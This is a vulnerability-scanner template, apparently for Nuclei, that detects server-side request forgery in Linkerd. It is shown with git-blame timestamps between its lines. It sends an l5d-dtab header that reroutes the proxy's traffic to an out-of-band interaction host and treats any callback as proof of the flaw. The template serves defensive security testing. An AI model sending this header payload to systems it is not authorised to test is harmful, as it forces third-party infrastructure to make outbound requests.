2021-07-25 09:52:09 +00:00
|
|
|
id: linkerd-ssrf-detection
|
2020-06-22 21:25:52 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Linkerd SSRF detection
|
|
|
|
author: dudez
|
2021-07-25 09:52:09 +00:00
|
|
|
severity: high
|
2024-01-03 06:08:41 +00:00
|
|
|
description: Linkerd is vulnerable to SSRF.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://twitter.com/nirvana_msu/status/1084144955034165248
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: ssrf,linkerd,oast,misconfig
|
2020-06-22 21:25:52 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-06-22 21:25:52 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-01-13 07:31:46 +00:00
|
|
|
- "{{BaseURL}}"
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2020-06-22 21:25:52 +00:00
|
|
|
headers:
|
2021-07-25 09:52:09 +00:00
|
|
|
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
|
2020-06-22 21:25:52 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-07-25 09:52:09 +00:00
|
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
2020-06-22 21:25:52 +00:00
|
|
|
words:
|
2023-10-14 11:27:55 +00:00
|
|
|
- "http"
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4a0a00473045022100a4c4a54627ac1c86404e929f166888f3e968a0e518363f281e473a1042418ff402200db8875e1d26514ab765930e390227ecc894e6e6df4f85b96f1cad6f42d46b4c:922c64590222798bb761d5b6d8e72950
|